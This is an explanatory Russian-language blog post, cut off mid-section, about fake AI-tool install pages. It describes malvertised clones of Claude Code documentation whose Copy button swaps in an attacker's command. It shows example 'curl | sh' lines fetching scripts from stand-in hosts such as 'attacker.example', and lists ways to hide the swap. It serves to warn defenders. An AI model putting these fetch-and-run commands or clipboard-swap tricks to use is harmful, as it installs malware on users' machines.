{"id":478926,"date":"2026-05-07T11:05:49","date_gmt":"2026-05-07T11:05:49","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=478926"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=478926","title":{"rendered":"Fake AI installers: \u043a\u0430\u043a \u00ab\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c Claude\u00bb \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0443\u0441\u043a \u043c\u0430\u043b\u0432\u0430\u0440\u0438"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 InstallFix-\u0430\u0442\u0430\u043a\u0438: \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0438\u0449\u0435\u0442 AI-tool, \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 \u0444\u0435\u0439\u043a\u043e\u0432\u0443\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u0443\u044e terminal-\u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0430 \u0432\u043c\u0435\u0441\u0442\u043e installer \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 malware chain.<\/p>\n<h3>\u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/h3>\n<p>\u042d\u0442\u043e \u043d\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Claude.<\/p>\n<p>\u0418 \u043d\u0435 \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u0440\u043e \u0442\u043e, \u0447\u0442\u043e \u201cAI-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u043e\u043f\u0430\u0441\u043d\u044b\u0435\u201d.<\/p>\n<p>\u042d\u0442\u043e \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u0440\u043e \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0443\u0447\u043d\u0443\u044e \u0438 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u043e\u043b\u0435\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u0443\u044e \u0432\u0435\u0449\u044c:<\/p>\n<pre><code>\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0438\u0432\u044b\u043a\u043b\u0438 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:87px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0418 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0431\u0438\u0442\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u044d\u0442\u0443 \u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0443.<\/p>\n<p>\u0420\u0430\u043d\u044c\u0448\u0435 \u0444\u0438\u0448\u0438\u043d\u0433 \u0447\u0430\u0449\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u043a\u0430\u043a \u043f\u0438\u0441\u044c\u043c\u043e, fake login page \u0438\u043b\u0438 \u201c\u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 \u0432\u0430\u0436\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u201d.<\/p>\n<p>\u0421\u0435\u0439\u0447\u0430\u0441 \u0432 \u043c\u0438\u0440\u0435 developer tools \u0438 AI coding assistants \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0434\u0440\u0443\u0433\u0430\u044f \u0444\u043e\u0440\u043c\u0430:<\/p>\n<pre><code>\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f install page\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f \u043a\u043d\u043e\u043f\u043a\u0430 Copy\u043c\u0430\u043b\u0432\u0430\u0440\u044c \u0432\u043c\u0435\u0441\u0442\u043e install.sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0427\u0435\u043b\u043e\u0432\u0435\u043a \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435.<\/p>\n<p>\u041e\u043d \u043f\u0440\u043e\u0441\u0442\u043e \u0433\u0443\u0433\u043b\u0438\u0442 \u201cClaude Code install\u201d, \u0432\u0438\u0434\u0438\u0442 sponsored result, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443, \u043f\u043e\u0445\u043e\u0436\u0443\u044e \u043d\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0435\u0435.<\/p>\n<p>\u0412\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u0430\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 CLI tool.<\/p>\n<p>\u0410 \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0430\u0447\u0430\u043b\u043e infection chain.<\/p>\n<h3>\u0427\u0442\u043e \u044d\u0442\u043e \u0437\u0430 \u043a\u043b\u0430\u0441\u0441 \u0430\u0442\u0430\u043a<\/h3>\n<p>Push Security \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u043f\u0430\u0442\u0442\u0435\u0440\u043d InstallFix.<\/p>\n<p>\u0418\u0434\u0435\u044f \u043f\u0440\u043e\u0441\u0442\u0430\u044f:<\/p>\n<ol>\n<li>\n<p>\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e developer tool.<\/p>\n<\/li>\n<li>\n<p>\u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u043e\u0447\u0442\u0438 \u043a\u0430\u043a \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f.<\/p>\n<\/li>\n<li>\n<p>\u0412\u043d\u0443\u0442\u0440\u0438 \u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b.<\/p>\n<\/li>\n<li>\n<p>\u0422\u0440\u0430\u0444\u0438\u043a \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Google Ads \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 malvertising.<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0435\u0435 \u0441\u0430\u043c.<\/p>\n<\/li>\n<li>\n<p>\u0412\u043c\u0435\u0441\u0442\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u0433\u043e installer \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f malicious payload.<\/p>\n<\/li>\n<\/ol>\n<p>\u042d\u0442\u043e \u0431\u043b\u0438\u0437\u043a\u043e \u043a ClickFix, \u043d\u043e pretext \u0434\u0440\u0443\u0433\u043e\u0439.<\/p>\n<p>\u0412 ClickFix \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0430\u0441\u0442\u043e \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u201c\u043f\u043e\u0447\u0438\u043d\u0438\u0442\u044c\u201d \u0447\u0442\u043e-\u0442\u043e: CAPTCHA, browser error, access issue.<\/p>\n<p>\u0412 InstallFix \u043d\u0438\u0447\u0435\u0433\u043e \u0447\u0438\u043d\u0438\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e.<\/p>\n<p>\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u0430\u043c \u0445\u043e\u0447\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u043e\u0444\u0442.<\/p>\n<p>\u042d\u0442\u043e \u0438 \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0439.<\/p>\n<h3>\u041f\u043e\u0447\u0435\u043c\u0443 Claude \u0438 AI tools \u0441\u0442\u0430\u043b\u0438 \u0443\u0434\u043e\u0431\u043d\u043e\u0439 \u043f\u0440\u0438\u043c\u0430\u043d\u043a\u043e\u0439<\/h3>\n<p>AI tooling \u0441\u0435\u0439\u0447\u0430\u0441 \u0440\u0430\u0441\u0442\u0435\u0442 \u043e\u0447\u0435\u043d\u044c \u0431\u044b\u0441\u0442\u0440\u043e.<\/p>\n<p>\u041b\u044e\u0434\u0438 \u0441\u0442\u0430\u0432\u044f\u0442 Claude Code, ChatGPT-related tools, Cursor plugins, MCP servers, agent frameworks, CLI wrappers, browser extensions, desktop clients.<\/p>\n<p>\u0418 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u044d\u0442\u043e \u0438\u0434\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 approval.<\/p>\n<p>\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0442\u0430\u043a:<\/p>\n<pre><code>\u043a\u043e\u043b\u043b\u0435\u0433\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0437\u0430\u0433\u0443\u0433\u043b\u0438\u043b install guide\u043d\u0430\u0448\u0435\u043b \u043f\u0435\u0440\u0432\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443\u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0414\u043b\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u044d\u0442\u043e \u043f\u043e\u0447\u0442\u0438 \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f:<\/p>\n<ul>\n<li>\n<p>\u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a \u043d\u043e\u0432\u043e\u043c\u0443 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0443;<\/p>\n<\/li>\n<li>\n<p>\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043e\u0436\u0438\u0434\u0430\u0435\u0442 \u0443\u0432\u0438\u0434\u0435\u0442\u044c terminal-\u043a\u043e\u043c\u0430\u043d\u0434\u0443;<\/p>\n<\/li>\n<li>\n<p>sponsored result \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u0448\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0432\u044b\u0434\u0430\u0447\u0438;<\/p>\n<\/li>\n<li>\n<p>\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043b\u0435\u0433\u043a\u043e \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f;<\/p>\n<\/li>\n<li>\n<p>install command \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u0440\u0430\u0432\u0434\u043e\u043f\u043e\u0434\u043e\u0431\u043d\u043e;<\/p>\n<\/li>\n<li>\n<p>\u043f\u043e\u0441\u043b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0434\u0430\u0436\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u043d\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 \u0441\u0430\u0439\u0442 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c.<\/p>\n<\/li>\n<\/ul>\n<p>Kaspersky \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0438\u0441\u0430\u043b, \u0447\u0442\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0434\u0432\u0438\u0433\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 search ads \u0438 \u0438\u043c\u0438\u0442\u0438\u0440\u0443\u044e\u0442 installation instructions \u0434\u043b\u044f Claude Code. Push Security \u0442\u043e\u0436\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u0433\u0434\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0432\u0430\u0436\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0441\u0430\u043c\u043e\u0439 install-\u043a\u043e\u043c\u0430\u043d\u0434\u0435.<\/p>\n<h3>\u041a\u0435\u0439\u0441: \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0441\u0442\u0430\u0432\u0438\u0442 Claude \u0447\u0435\u0440\u0435\u0437 install.sh<\/h3>\n<p>\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043c \u0440\u0435\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439.<\/p>\n<p>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c AI coding assistant.<\/p>\n<p>\u041e\u043d \u0438\u0449\u0435\u0442:<\/p>\n<pre><code>Claude Code install<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0412\u0432\u0435\u0440\u0445\u0443 \u0432\u044b\u0434\u0430\u0447\u0438 \u0432\u0438\u0434\u0438\u0442 sponsored result.<\/p>\n<p>\u0414\u043e\u043c\u0435\u043d \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u043e\u0447\u0442\u0438 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e:<\/p>\n<pre><code>claude-code-docs.exampleclaude-code-install.exampleclaude-update.example<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u043f\u043e\u0445\u043e\u0436\u0430 \u043d\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e:<\/p>\n<ul>\n<li>\n<p>\u043b\u043e\u0433\u043e\u0442\u0438\u043f;<\/p>\n<\/li>\n<li>\n<p>sidebar;<\/p>\n<\/li>\n<li>\n<p>quickstart;<\/p>\n<\/li>\n<li>\n<p>tabs \u0434\u043b\u044f macOS\/Linux\/Windows;<\/p>\n<\/li>\n<li>\n<p>\u043a\u043d\u043e\u043f\u043a\u0430 Copy;<\/p>\n<\/li>\n<li>\n<p>\u043a\u043e\u0440\u043e\u0442\u043a\u0430\u044f install-\u043a\u043e\u043c\u0430\u043d\u0434\u0430.<\/p>\n<\/li>\n<\/ul>\n<p>\u041d\u0430 \u044d\u043a\u0440\u0430\u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u0438\u0434\u0438\u0442 \u0447\u0442\u043e-\u0442\u043e \u0432\u0440\u043e\u0434\u0435:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/claude.ai\/install.sh | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0438\u0434\u0438\u043c\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 clipboard, \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u043d\u044b \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0442\u044c.<\/p>\n<p>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/claude.ai\/install.sh | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0410 \u043f\u043e\u0441\u043b\u0435 \u043d\u0430\u0436\u0430\u0442\u0438\u044f Copy \u0432 clipboard \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0430\u0441\u0442\u044c:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/download.example.invalid\/install.sh | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0418\u043b\u0438 \u0435\u0449\u0435 \u0445\u0443\u0436\u0435:<\/p>\n<pre><code class=\"bash\">curl -fsSL https:\/\/download.example.invalid\/bootstrap | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0430\u0432\u0434\u043e\u043f\u043e\u0434\u043e\u0431\u043d\u043e.<\/p>\n<p>\u0421\u0443\u0442\u044c \u043d\u0435 \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c URL.<\/p>\n<p>\u0421\u0443\u0442\u044c \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u0432\u0435\u0440\u044f\u0435\u0442 UI \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u0430 \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043f\u0435\u0440\u0435\u0434 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c.<\/p>\n<h3>\u0413\u0434\u0435 \u0437\u0434\u0435\u0441\u044c JavaScript<\/h3>\n<p>\u0412 web-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043e\u0431\u044b\u0447\u043d\u043e \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0442\u0435\u043a\u0441\u0442 \u0438 \u0440\u044f\u0434\u043e\u043c \u043b\u0435\u0436\u0438\u0442 \u043a\u043d\u043e\u043f\u043a\u0430 Copy.<\/p>\n<p>\u042d\u0442\u0430 \u043a\u043d\u043e\u043f\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0435 \u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u0438\u0434\u0438\u0442 \u0433\u043b\u0430\u0437\u0430\u043c\u0438.<\/p>\n<p>\u0423\u0441\u043b\u043e\u0432\u043d\u043e:<\/p>\n<pre><code>visible text:  curl -fsSL https:\/\/official.example\/install.sh | shclipboard value:  curl -fsSL https:\/\/attacker.example\/install.sh | sh<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0438 \u0442\u043e\u043d\u044c\u0448\u0435:<\/p>\n<ul>\n<li>\n<p>\u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u043c\u0435\u043d \u0432 UI;<\/p>\n<\/li>\n<li>\n<p>\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c attacker-controlled URL;<\/p>\n<\/li>\n<li>\n<p>\u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c base64-decoding;<\/p>\n<\/li>\n<li>\n<p>\u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c silent flags;<\/p>\n<\/li>\n<li>\n<p>\u0432\u044b\u0431\u0438\u0440\u0430\u0442\u044c payload \u043f\u043e\u0434 OS;<\/p>\n<\/li>\n<li>\n<p>\u043f\u043e\u0434\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u043d\u0443\u0436\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u044b \u0438\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438;<\/p>\n<\/li>\n<li>\n<p>\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u0438\u0437 ad campaign.<\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u201c\u044f \u0436\u0435 \u0432\u0438\u0434\u0435\u043b \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435\u201d \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0435\u0439.<\/p>\n<p>\u0413\u0430\u0440\u0430\u043d\u0442\u0438\u044f \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0433\u0434\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0441\u043c\u043e\u0442\u0440\u0438\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0443\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 paste, \u0434\u043e Enter.<\/p>\n<p>\u0414\u0430, \u044d\u0442\u043e \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u043e.<\/p>\n<p>\u041d\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a\u0438\u0435 \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0449\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0438 \u043b\u043e\u043c\u0430\u044e\u0442\u0441\u044f.<\/p>\n<h3>Windows-\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: mshta \u0438 PowerShell<\/h3>\n<p>\u0412 Windows-\u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u0445 \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f living-off-the-land binaries.<\/p>\n<p>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u0442\u0430\u043a:<\/p>\n<pre><code>browser \/ user paste  -&gt; PowerShell  -&gt; 